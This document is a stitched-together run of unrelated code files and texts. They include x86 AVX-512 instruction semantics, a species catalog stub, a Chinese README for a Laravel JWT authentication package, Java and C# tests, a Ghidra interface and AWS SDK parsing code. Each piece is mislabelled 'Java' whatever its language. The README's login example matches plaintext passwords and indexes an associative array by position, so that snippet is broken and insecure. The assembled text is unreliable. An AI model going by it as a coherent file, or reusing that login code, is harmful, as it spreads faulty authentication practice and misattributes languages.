VPMOVSXWD_YMMi32_MASKmskw_XMMi16_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 5995 VPMOVSXWD VPMOVSXWD_YMMi32_MASKmskw_MEMi16_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 5996 VMOVHLPS VMOVHLPS_XMMf32_XMMf32_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128N ATTRIBUTES: 6007 VPMOVSXWQ VPMOVSXWQ_ZMMi64_MASKmskw_XMMi16_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 6008 VPMOVSXWQ VPMOVSXWQ_ZMMi64_MASKmskw_MEMi16_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 6009 VPMOVSXWQ VPMOVSXWQ_XMMi64_MASKmskw_XMMi16_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 6010 VPMOVSXWQ VPMOVSXWQ_XMMi64_MASKmskw_MEMi16_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 6011 VPMOVSXWQ VPMOVSXWQ_YMMi64_MASKmskw_XMMi16_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 6012 VPMOVSXWQ VPMOVSXWQ_YMMi64_MASKmskw_MEMi16_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 6171 VMOVDQA32 VMOVDQA32_ZMMu32_MASKmskw_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 6172 VMOVDQA32 VMOVDQA32_ZMMu32_MASKmskw_MEMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT 6173 VMOVDQA32 VMOVDQA32_ZMMu32_MASKmskw_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 6174 VMOVDQA32 VMOVDQA32_MEMu32_MASKmskw_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT 6175 VMOVDQA32 VMOVDQA32_XMMu32_MASKmskw_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 6176 VMOVDQA32 VMOVDQA32_XMMu32_MASKmskw_MEMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT 6177 VMOVDQA32 VMOVDQA32_XMMu32_MASKmskw_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 6178 VMOVDQA32 VMOVDQA32_MEMu32_MASKmskw_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT 6179 VMOVDQA32 VMOVDQA32_YMMu32_MASKmskw_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 6180 VMOVDQA32 VMOVDQA32_YMMu32_MASKmskw_MEMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT 6181 VMOVDQA32 VMOVDQA32_YMMu32_MASKmskw_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 6182 VMOVDQA32 VMOVDQA32_MEMu32_MASKmskw_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT 6309 VPMOVQW VPMOVQW_XMMu16_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 6310 VPMOVQW VPMOVQW_MEMu16_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 6311 VPMOVQW VPMOVQW_XMMu16_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 6312 VPMOVQW VPMOVQW_MEMu16_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 6313 VPMOVQW VPMOVQW_XMMu16_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 6314 VPMOVQW VPMOVQW_MEMu16_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 6325 VPMOVQB VPMOVQB_XMMu8_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 6326 VPMOVQB VPMOVQB_MEMu8_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_EIGHTHMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 6327 VPMOVQB VPMOVQB_XMMu8_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 6328 VPMOVQB VPMOVQB_MEMu8_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_EIGHTHMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 6329 VPMOVQB VPMOVQB_XMMu8_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 6330 VPMOVQB VPMOVQB_MEMu8_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_EIGHTHMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 6331 VPMOVQD VPMOVQD_YMMu32_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 6332 VPMOVQD VPMOVQD_MEMu32_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 6333 VPMOVQD VPMOVQD_XMMu32_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 6334 VPMOVQD VPMOVQD_MEMu32_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 6335 VPMOVQD VPMOVQD_XMMu32_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 6336 VPMOVQD VPMOVQD_MEMu32_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 6349 VPMOVM2Q VPMOVM2Q_XMMu64_MASKmskw_AVX512 DATAXFER AVX512EVEX AVX512DQ_128 ATTRIBUTES: 6350 VPMOVM2Q VPMOVM2Q_YMMu64_MASKmskw_AVX512 DATAXFER AVX512EVEX AVX512DQ_256 ATTRIBUTES: 6351 VPMOVM2Q VPMOVM2Q_ZMMu64_MASKmskw_AVX512 DATAXFER AVX512EVEX AVX512DQ_512 ATTRIBUTES: */ namespace { template <typename D, typename S> DEF_SEM(MOVZX, D dst, S src) { WriteZExt(dst, Read(src)); return memory; } template <typename D, typename S, typename SextT> DEF_SEM(MOVSX, D dst, S src) { WriteZExt(dst, SExtTo<SextT>(Read(src))); return memory; } } // namespace DEF_ISEL(MOVZX_GPRv_MEMb_16) = MOVZX<R16W, M8>; DEF_ISEL(MOVZX_GPRv_MEMb_32) = MOVZX<R32W, M8>; IF_64BIT(DEF_ISEL(MOVZX_GPRv_MEMb_64) = MOVZX<R64W, M8>;) DEF_ISEL(MOVZX_GPRv_GPR8_16) = MOVZX<R16W, R8>; DEF_ISEL(MOVZX_GPRv_GPR8_32) = MOVZX<R32W, R8>; IF_64BIT(DEF_ISEL(MOVZX_GPRv_GPR8_64) = MOVZX<R64W, R8>;) DEF_ISEL(MOVZX_GPRv_MEMw_32) = MOVZX<R32W, M16>; IF_64BIT(DEF_ISEL(MOVZX_GPRv_MEMw_64) = MOVZX<R64W, M16>;) DEF_ISEL(MOVZX_GPRv_GPR16_32) = MOVZX<R32W, R16>; IF_64BIT(DEF_ISEL(MOVZX_GPRv_GPR16_64) = MOVZX<R64W, R16>;) DEF_ISEL(MOVSX_GPRv_MEMb_16) = MOVSX<R16W, M8, int16_t>; DEF_ISEL(MOVSX_GPRv_MEMb_32) = MOVSX<R32W, M8, int32_t>; IF_64BIT(DEF_ISEL(MOVSX_GPRv_MEMb_64) = MOVSX<R64W, M8, int64_t>;) DEF_ISEL(MOVSX_GPRv_GPR8_16) = MOVSX<R16W, R8, int16_t>; DEF_ISEL(MOVSX_GPRv_GPR8_32) = MOVSX<R32W, R8, int32_t>; IF_64BIT(DEF_ISEL(MOVSX_GPRv_GPR8_64) = MOVSX<R64W, R8, int64_t>;) DEF_ISEL(MOVSX_GPRv_MEMw_32) = MOVSX<R32W, M16, int32_t>; IF_64BIT(DEF_ISEL(MOVSX_GPRv_MEMw_64) = MOVSX<R64W, M16, int64_t>;) DEF_ISEL(MOVSX_GPRv_GPR16_32) = MOVSX<R32W, R16, int32_t>; IF_64BIT(DEF_ISEL(MOVSX_GPRv_GPR16_64) = MOVSX<R64W, R16, int64_t>;) DEF_ISEL(MOVSXD_GPRv_GPRz_16) = MOVSX<R32W, R16, int32_t>; DEF_ISEL(MOVSXD_GPRv_GPRz_32) = MOVSX<R32W, R32, int32_t>; IF_64BIT(DEF_ISEL(MOVSXD_GPRv_MEMd_32) = MOVSX<R64W, M32, int64_t>;) IF_64BIT(DEF_ISEL(MOVSXD_GPRv_GPR32_32) = MOVSX<R64W, R32, int64_t>;) IF_64BIT(DEF_ISEL(MOVSXD_GPRv_MEMd_64) = MOVSX<R64W, M32, int64_t>;) IF_64BIT(DEF_ISEL(MOVSXD_GPRv_MEMz_64) = MOVSX<R64W, M32, int64_t>;) IF_64BIT(DEF_ISEL(MOVSXD_GPRv_GPR32_64) = MOVSX<R64W, R32, int64_t>;) IF_64BIT(DEF_ISEL(MOVSXD_GPRv_GPRz_64) = MOVSX<R64W, R32, int64_t>;) #if HAS_FEATURE_AVX512 namespace { template <typename D, typename K, typename S> DEF_SEM(VPMOVSXBQ_MASKmskw_SIMD128, D dst, K k1, S src) { auto src_vec = SReadV8(src); auto dst_vec = SClearV64(SReadV64(dst)); auto k_vec = Read(k1); for (auto i = 0u; i < 2u; i++) { if (READBIT(k_vec, i) == 0) { dst_vec = SInsertV64(dst_vec, i, 0); } else { auto v = SExtTo<int64_t>(SExtractV8(src_vec, i)); dst_vec = SInsertV64(dst_vec, i, v); } } SWriteV64(dst, dst_vec); return memory; } template <typename D, typename K, typename S> DEF_SEM(VPMOVSXWD_MASKmskw_SIMD128, D dst, K k1, S src) { auto src_vec = SReadV16(src); auto dst_vec = SClearV32(SReadV32(dst)); auto k_vec = Read(k1); for (auto i = 0u; i < 4u; i++) { if (READBIT(k_vec, i) == 0) { dst_vec = SInsertV32(dst_vec, i, 0); } else { auto v = SExtTo<int32_t>(SExtractV16(src_vec, i)); dst_vec = SInsertV32(dst_vec, i, v); } } SWriteV32(dst, dst_vec); return memory; } template <typename S1, typename S2> DEF_SEM(KMOVW, S1 dst, S2 src) { WriteZExt(dst, UInt16(Read(src))); return memory; } } // namespace DEF_ISEL(VPMOVSXBQ_XMMi64_MASKmskw_MEMi8_AVX512) = VPMOVSXBQ_MASKmskw_SIMD128<VV128W, R8, MV16>; DEF_ISEL(VPMOVSXBQ_XMMi64_MASKmskw_XMMi8_AVX512) = VPMOVSXBQ_MASKmskw_SIMD128<VV128W, R8, V128>; DEF_ISEL(VPMOVSXWD_XMMi32_MASKmskw_MEMi16_AVX512) = VPMOVSXWD_MASKmskw_SIMD128<VV128W, R8, MV64>; DEF_ISEL(VPMOVSXWD_XMMi32_MASKmskw_XMMi16_AVX512) = VPMOVSXWD_MASKmskw_SIMD128<VV128W, R8, V128>; DEF_ISEL(KMOVW_MASKmskw_MASKu16_AVX512) = KMOVW<R64W, R64>; DEF_ISEL(KMOVW_GPR32u32_MASKmskw_AVX512) = KMOVW<R32W, R64>; DEF_ISEL(KMOVW_MASKmskw_GPR32u32_AVX512) = KMOVW<R64W, R32>; DEF_ISEL(KMOVW_MASKmskw_MEMu16_AVX512) = KMOVW<R64W, M16>; DEF_ISEL(KMOVW_MEMu16_MASKmskw_AVX512) = KMOVW<M16W, R64>; #endif // HAS_FEATURE_AVX512
Java
# Bihai stricta (Huber) Griggs SPECIES #### Status SYNONYM #### According to The Catalogue of Life, 3rd January 2011 #### Published in null #### Original name null ### Remarks null
Java
/** * Copyright 2011-2017 Asakusa Framework Team. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.asakusafw.compiler.batch; import com.asakusafw.compiler.batch.batch.JobFlow1; import com.asakusafw.vocabulary.batch.Batch; import com.asakusafw.vocabulary.batch.BatchDescription; /** * A batch class which is not public. */ @Batch(name = "testing") class NotPublic extends BatchDescription { @Override protected void describe() { run(JobFlow1.class).soon(); } }
Java
# 注意!!! 由于该库的主要目的是JWT的实现原理的技术分享,而我目前忙于公司的Android项目,暂没有时间维护当前扩展包(对Laravel5.4的兼容性不好),并且扩展包稳定性还有待验证,不推荐使用到正式环境。 所以我推荐大家使用 https://github.com/tymondesigns/jwt-auth :),如果你有JWT相关不懂的,可以提issue,大家一起探讨。 如果你想学习JWT的实现原理,我相信本项目应该会带给你一些帮助:),配合专栏食用更佳 https://zhuanlan.zhihu.com/p/22531819 # jwt-auth [![PHP version](https://badge.fury.io/ph/lsxiao%2Fjwt-auth.svg)](https://badge.fury.io/ph/lsxiao%2Fjwt-auth) Laravel/Lumen JSON Web Token 认证扩展包 ## 待完成 - [ ] 更加详细的单元测试 - [ ] 命令行生成HMAC RSA 秘钥 ## 引入jwt-auth到项目中 ```bash composer require "lsxiao/jwt-auth" ``` ## 使用方法 ### 配置jwt-auth #### Laravel ```bash php artisan vendor:publish ``` jwt.php配置文件会被拷贝到项目根目录的config文件夹中 #### Lumen 在项目的lumen项目的根目录创建config文件夹,将```jwt.php```配置文件复制到此处 ```php <?php return [ /* |-------------------------------------------------------------------------- | HMAC 签名秘钥 |-------------------------------------------------------------------------- | | HMAC 签名秘钥是用来为token进行HMAC签名的,必须在.env文件中设置。 | */ 'secret_key' => env('JWT_SECRET_KEY'), /* |-------------------------------------------------------------------------- | RSA 签名私钥 |-------------------------------------------------------------------------- | | RSA 签名私钥是用来为token进行RSA签名的,必须在.env文件中设置。 | */ 'private_secret_key' => env('JWT_PRIVATE_SECRET_KEY'), /* |-------------------------------------------------------------------------- | RSA 签名公钥 |-------------------------------------------------------------------------- | | RSA 签名公钥是用来为token进行RSA签名解密的,必须在.env文件中设置。 | */ 'public_secret_key' => env('JWT_PUBLIC_SECRET_KEY'), /* |-------------------------------------------------------------------------- | Token 有效期 |-------------------------------------------------------------------------- | | 指定token的有效时间(单位分钟),默认1小时。 | */ 'ttl' => env('JWT_TTL', 60), /* |-------------------------------------------------------------------------- | Token 刷新有效期 |-------------------------------------------------------------------------- | | 指定token过期后,多长一段时间内,使用过期的token能够刷新。默认为3周 | */ 'refresh_ttl' => env('JWT_REFRESH_TTL', 30240), /* |-------------------------------------------------------------------------- | JWT 算法ID |-------------------------------------------------------------------------- | | Token HMAC签名的HASH算法 | 对称算法: | HS256, HS384, HS512 | 非对称算法,需提供公私钥: | RS256, RS384, RS512 */ 'algorithm_id' => env('JWT_ALGORITHM', \Lsxiao\JWT\Singer\HMAC::DEFAULT_ALGO_ID), /* |-------------------------------------------------------------------------- | 指定Token在某时间之前无法使用 |-------------------------------------------------------------------------- | | 指定一个时间增量(单位秒),在此签发时间+此事件增量时间之前,Token都不能使用 | */ 'not_before=>' => env('JWT_NOT_BEFORE', 0), /* |-------------------------------------------------------------------------- | 刷新Token次数差值 |-------------------------------------------------------------------------- | | 最新刷新次数会缓存在Server,如果客户端的token刷新次数与Server缓存相差大于此值,就会判定无效Token | */ 'refresh_diff_limit=>' => env('JWT_REFRESH_DIFF_LIMIT', 2), /* |-------------------------------------------------------------------------- | 黑名单宽限时间,单位秒 |-------------------------------------------------------------------------- | | 每次刷新后,Token会被加入黑名单,在高并发的情况下,后续请求Token会无效,当设置宽限时间后, | Token刷新后,加入黑名单的Token只要处于宽限时间内,则是有效的。 | */ 'blacklist_grace_time' => env('JWT_BLACK_LIST_GRACE_TIME', 30) ]; ``` ### 配置auth #### Laravel 在config文件夹中找到auth.php #### Lumen 将```auth.php```配置文件复制到config文件夹 修改如下: ```php <?php return [ 'defaults' => [ 'guard' => env('AUTH_GUARD', 'api'), ], 'guards' => [ 'api' => ['driver' => 'jwt'],//这里必须是jwt,由JWTGuard驱动 ], 'providers' => [ // ], ]; ``` ### 开启认证 修改 bootstrap/app.php,取消 auth middleware 及 AuthServiceProvider 的注释 修改 app/Providers/AuthServiceProvider.php 的 boot 方法: ```php public function boot() { $this->app->configure('jwt'); $this->app['auth']->viaRequest('api', function ($request) { $token = \Lsxiao\JWT\Token::fromRequest($request); if (!empty($token) && $token->isValid()) { $userid = $token->getClaim('sub')->getValue(); return User::find($userid); } }); } ``` ### 用户类 用户类 User 需要确认已实现 \Illuminate\Contracts\Auth\Authenticatable 接口,默认的 User 类即可 ### 在Controller中根据账号密码获取Token ```php public function login(Request $request) { //通过user返回一个Token $credentials = $request->only('email', 'password'); $user = User::where('email', $credentials[0])->where('password', $credentials[1])->first(); $token = \Lsxiao\JWT\Token::fromUser($user); return response()->json(['token' => $token]); } ``` ### 在需要的地方刷新Token Controller 中 ```php public function login(Request $request) { //从请求取出证书,也就是邮件密码    $token = \Lsxiao\JWT\Token::refreshToken($request);    if (!$token) { throw new TokenInvalidException("refresh failed"); } return response()->json(['token' => $token]); } ``` Middleware 中 ```php public function handle($request, Closure $next, $guard = null) { if ($this->auth->guard($guard)->guest()) { return response('Unauthorized.', 401); } $response = $next($request); // RefreshToken : reset HTTP Response Header \Lsxiao\JWT\Token::refreshToken($request, $response); return $response; } ``` ### 需要处理的异常 所有异常都继承自`Lsxiao\JWT\Exception\BaseJWTException`,建议在`App\Exceptions\Handler`处理异常,返回不同的HTTP status code - `Lsxiao\JWT\Exception\SecretKeyException` 秘钥在.evn文件中不存在,秘钥不符合规范等 - `Lsxiao\JWT\Exception\TokenExpiredException` Token 过期 - `Lsxiao\JWT\Exception\TokenInvalidException` Token 无效 - `Lsxiao\JWT\Exception\TokenNotInRequestException` Token不存在于Request QueryParam或者Body或者Header中 - `Lsxiao\JWT\Exception\TokenParseException` token解析异常 - `Lsxiao\JWT\Exception\UnauthorizedException` 未授权异常 ## 版本说明 - 1.0.4 (2016-11-21) - 修复hasBlacklistGraceTimeOrNotInBlacklist函数的bug。 - 1.0.3 (2016-11-21) - 修复Auth::refreshToken方法不能刷新成功的严重BUG - 1.0.2 (2016-10-28) - 支持Laravel,提供LaravelServiceProvider - 1.0.1 (2016-10-28) - 修复获取用户的时候没进行身份认证的BUG - 1.0 (2016-9-29) - jwt基本功能提交 ## 维护人 知乎 : [@面条](https://www.zhihu.com/people/lsxiao) Github : [@lsxiao](https://github.com/lsxiao) ## 开源许可 Copyright 2016 lsxiao, Inc. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
Java
package com.google.api.ads.dfp.jaxws.v201511; import javax.xml.bind.annotation.XmlEnum; import javax.xml.bind.annotation.XmlType; /** * <p>Java class for CustomTargetingValue.Status. * * <p>The following schema fragment specifies the expected content contained within this class. * <p> * <pre> * &lt;simpleType name="CustomTargetingValue.Status"> * &lt;restriction base="{http://www.w3.org/2001/XMLSchema}string"> * &lt;enumeration value="ACTIVE"/> * &lt;enumeration value="INACTIVE"/> * &lt;enumeration value="UNKNOWN"/> * &lt;/restriction> * &lt;/simpleType> * </pre> * */ @XmlType(name = "CustomTargetingValue.Status") @XmlEnum public enum CustomTargetingValueStatus { /** * * The object is active. * * */ ACTIVE, /** * * The object is no longer active. * * */ INACTIVE, /** * * The value returned if the actual value is not exposed by the requested * API version. * * */ UNKNOWN; public String value() { return name(); } public static CustomTargetingValueStatus fromValue(String v) { return valueOf(v); } }
Java
/* ### * IP: GHIDRA * REVIEWED: YES * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package ghidra.app.plugin.core.compositeeditor; /** * Composite Viewer Model component selection change listener interface. */ public interface CompositeModelSelectionListener { /** * Called to indicate the model's component selection has changed. */ void selectionChanged(); }
Java
/* * Copyright 2010-2017 Amazon.com, Inc. or its affiliates. All Rights Reserved. * * Licensed under the Apache License, Version 2.0 (the "License"). * You may not use this file except in compliance with the License. * A copy of the License is located at * * http://aws.amazon.com/apache2.0 * * or in the "license" file accompanying this file. This file is distributed * on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either * express or implied. See the License for the specific language governing * permissions and limitations under the License. */ #include <aws/ec2/model/DescribeInstancesResponse.h> #include <aws/core/utils/xml/XmlSerializer.h> #include <aws/core/AmazonWebServiceResult.h> #include <aws/core/utils/StringUtils.h> #include <aws/core/utils/logging/LogMacros.h> #include <utility> using namespace Aws::EC2::Model; using namespace Aws::Utils::Xml; using namespace Aws::Utils::Logging; using namespace Aws::Utils; using namespace Aws; DescribeInstancesResponse::DescribeInstancesResponse() { } DescribeInstancesResponse::DescribeInstancesResponse(const Aws::AmazonWebServiceResult<XmlDocument>& result) { *this = result; } DescribeInstancesResponse& DescribeInstancesResponse::operator =(const Aws::AmazonWebServiceResult<XmlDocument>& result) { const XmlDocument& xmlDocument = result.GetPayload(); XmlNode rootNode = xmlDocument.GetRootElement(); XmlNode resultNode = rootNode; if (!rootNode.IsNull() && (rootNode.GetName() != "DescribeInstancesResponse")) { resultNode = rootNode.FirstChild("DescribeInstancesResponse"); } if(!resultNode.IsNull()) { XmlNode reservationsNode = resultNode.FirstChild("reservationSet"); if(!reservationsNode.IsNull()) { XmlNode reservationsMember = reservationsNode.FirstChild("item"); while(!reservationsMember.IsNull()) { m_reservations.push_back(reservationsMember); reservationsMember = reservationsMember.NextNode("item"); } } XmlNode nextTokenNode = resultNode.FirstChild("nextToken"); if(!nextTokenNode.IsNull()) { m_nextToken = StringUtils::Trim(nextTokenNode.GetText().c_str()); } } if (!rootNode.IsNull()) { XmlNode requestIdNode = rootNode.FirstChild("requestId"); if (!requestIdNode.IsNull()) { m_responseMetadata.SetRequestId(StringUtils::Trim(requestIdNode.GetText().c_str())); } AWS_LOGSTREAM_DEBUG("Aws::EC2::Model::DescribeInstancesResponse", "x-amzn-request-id: " << m_responseMetadata.GetRequestId() ); } return *this; }
Java
/* * This file is part of "lunisolar-magma". * * (C) Copyright 2014-2022 Lunisolar (http://lunisolar.eu/). * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package eu.lunisolar.magma.asserts.func.function.to; import eu.lunisolar.magma.asserts.func.FunctionalAttest.AssertionsCheck; import eu.lunisolar.magma.asserts.func.FunctionalAttest.SemiEvaluation; import eu.lunisolar.magma.func.supp.Be; import eu.lunisolar.magma.asserts.func.FunctionalAttest; import eu.lunisolar.magma.asserts.func.FunctionalAttest.*; import javax.annotation.Nonnull; // NOSONAR import javax.annotation.Nullable; // NOSONAR import eu.lunisolar.magma.func.supp.check.Checks; // NOSONAR import eu.lunisolar.magma.basics.meta.*; // NOSONAR import eu.lunisolar.magma.basics.meta.functional.*; // NOSONAR import eu.lunisolar.magma.basics.meta.functional.type.*; // NOSONAR import eu.lunisolar.magma.basics.meta.functional.domain.*; // NOSONAR import eu.lunisolar.magma.func.action.*; // NOSONAR import java.util.function.*; import eu.lunisolar.magma.func.function.to.*; import eu.lunisolar.magma.func.action.*; // NOSONAR import eu.lunisolar.magma.func.consumer.*; // NOSONAR import eu.lunisolar.magma.func.consumer.primitives.*; // NOSONAR import eu.lunisolar.magma.func.consumer.primitives.bi.*; // NOSONAR import eu.lunisolar.magma.func.consumer.primitives.obj.*; // NOSONAR import eu.lunisolar.magma.func.consumer.primitives.tri.*; // NOSONAR import eu.lunisolar.magma.func.function.*; // NOSONAR import eu.lunisolar.magma.func.function.conversion.*; // NOSONAR import eu.lunisolar.magma.func.function.from.*; // NOSONAR import eu.lunisolar.magma.func.function.to.*; // NOSONAR import eu.lunisolar.magma.func.operator.binary.*; // NOSONAR import eu.lunisolar.magma.func.operator.ternary.*; // NOSONAR import eu.lunisolar.magma.func.operator.unary.*; // NOSONAR import eu.lunisolar.magma.func.predicate.*; // NOSONAR import eu.lunisolar.magma.func.supplier.*; // NOSONAR import eu.lunisolar.magma.func.function.to.LToIntBiFunction.*; /** Assert class for LToIntObj1Obj0Func. */ public final class LToIntObj1Obj0FuncAttest<T2, T1> extends FunctionalAttest.Full<LToIntObj1Obj0FuncAttest<T2, T1>, LToIntObj1Obj0Func<T2, T1>, LBiConsumer<T2, T1>, Checks.CheckInt> { public LToIntObj1Obj0FuncAttest(LToIntObj1Obj0Func<T2, T1> actual) { super(actual); } @Nonnull public static <T2, T1> LToIntObj1Obj0FuncAttest<T2, T1> attestToIntObj1Obj0Func(LToIntBiFunction.LToIntObj1Obj0Func<T2, T1> func) { return new LToIntObj1Obj0FuncAttest(func); } @Nonnull public IntEvaluation<LToIntObj1Obj0FuncAttest<T2, T1>, LBiConsumer<T2, T1>> doesApplyAsInt(T2 a2, T1 a1) { return new IntEvaluation<LToIntObj1Obj0FuncAttest<T2, T1>, LBiConsumer<T2, T1>>(this, () -> String.format("(%s,%s)", a2, a1), (desc, pc) -> { var func = value(); Checks.check(func).must(Be::notNull, "Actual function is null."); if (pc != null) { pc.accept(a2, a1); } var result = func.applyAsIntObj1Obj0(a2, a1); return Checks.attest(result, desc); }, recurringAssert); } }
Java
// [[[[INFO> // Copyright 2015 Epicycle (http://epicycle.org, https://github.com/open-epicycle) // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. // // For more information check https://github.com/open-epicycle/Epicycle.Input-cs // ]]]] using NUnit.Framework; namespace Epicycle.Input.Keyboard { [TestFixture] public class KeyEventArgsTest { [Test] public void ctor_sets_properties_correctly() { var eventArgs = new KeyEventArgs<int, int>(123, KeyEventType.Released, 234); Assert.That(eventArgs.KeyId, Is.EqualTo(123)); Assert.That(eventArgs.EventType, Is.EqualTo(KeyEventType.Released)); Assert.That(eventArgs.AdditionalData, Is.EqualTo(234)); } } }
Java
